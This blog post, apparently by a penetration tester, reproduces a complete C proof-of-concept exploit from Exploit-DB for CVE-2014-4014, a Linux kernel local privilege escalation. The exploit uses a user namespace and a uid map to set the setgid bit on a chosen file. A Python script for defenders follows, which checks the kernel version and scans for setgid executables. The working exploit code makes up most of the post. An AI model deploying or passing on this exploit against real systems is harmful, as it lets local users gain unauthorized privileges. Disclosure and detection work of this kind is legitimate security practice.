Linux Kernel Local Privilege Escalation PoC


Exploit-DB has recently published a local privilege escalation PoC for CVE-2014-4014, reproduced below, which affects Linux kernel 3.13 and below.

Local attackers can exploit the issue to execute arbitrary code with elevated privileges or crash the system, effectively denying service to legitimate users.

    /**
     * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
     *
     * Vitaly Nikolenko
     * http://hashcrack.org
     *
     * Usage: ./poc [file_path]
     *
     * where file_path is the file on which you want to set the sgid bit
     */
    #define _GNU_SOURCE
    #include <sched.h>
    #include <signal.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <limits.h>
    #include <assert.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/wait.h>

    #define STACK_SIZE (1024 * 1024)
    static char child_stack[STACK_SIZE];

    struct args {
        int pipe_fd[2];
        char *file_path;
    };

    static int child(void *arg) {
        struct args *f_args = (struct args *)arg;
        char c;
        // close the write end of the pipe; the read below returns 0 (EOF)
        // once the parent has written the uid map and closed its write end
        close(f_args->pipe_fd[1]);
        assert(read(f_args->pipe_fd[0], &c, 1) == 0);
        // set the setgid bit
        chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
        return 0;
    }

    int main(int argc, char *argv[]) {
        int fd;
        pid_t pid;
        char mapping[1024];
        char map_file[PATH_MAX];
        struct args f_args;
        assert(argc == 2);
        f_args.file_path = argv[1];
        // create a pipe for synching the child and parent
        assert(pipe(f_args.pipe_fd) != -1);
        pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
        assert(pid != -1);
        // get the current uid outside the namespace
        snprintf(mapping, 1024, "0 %d 1\n", getuid());
        // update the uid map of the child's user namespace
        snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
        fd = open(map_file, O_RDWR); assert(fd != -1);
        assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
        close(f_args.pipe_fd[1]);
        assert (waitpid(pid, NULL, 0) != -1);
        return 0;
    }
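A defender's companion to the PoC above, added here as an example and not part of the original post or the PoC author's code: it checks whether a running kernel falls in the affected range the post names (3.13 and below) and scans a directory tree for regular files carrying the setgid-plus-group-execute mode the PoC sets, so that unexpected setgid files can be reviewed. The scan root used in the usage block is an assumption; point it at the directories you care about.

```python
import os
import re
import stat

# Highest affected kernel series named in the post: 3.13 and below.
AFFECTED_MAX = (3, 13)


def parse_kernel_release(release):
    """Return (major, minor) from a `uname -r` string such as '3.13.0-24-generic'."""
    m = re.match(r"(\d+)\.(\d+)", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return int(m.group(1)), int(m.group(2))


def kernel_in_affected_range(release):
    """True when the kernel series is 3.13 or earlier (the range the post names)."""
    return parse_kernel_release(release) <= AFFECTED_MAX


def is_setgid_executable(mode):
    """True when a file mode carries S_ISGID together with group execute,
    which is the combination the PoC's chmod() call produces."""
    return bool(mode & stat.S_ISGID) and bool(mode & stat.S_IXGRP)


def find_setgid_files(root):
    """Walk `root` and return (path, uid, gid) for every regular setgid executable."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and is_setgid_executable(st.st_mode):
                hits.append((path, st.st_uid, st.st_gid))
    return hits


if __name__ == "__main__":
    release = os.uname().release
    print("kernel %s in affected range: %s" % (release, kernel_in_affected_range(release)))
    # Assumed scan root for illustration; use the paths relevant to your host.
    for path, uid, gid in find_setgid_files("/usr/local/bin"):
        print("setgid executable: %s uid=%d gid=%d" % (path, uid, gid))
```

Files reported by the scan are not proof of exploitation; compare owner and group against what the package manager or your baseline expects.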

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]
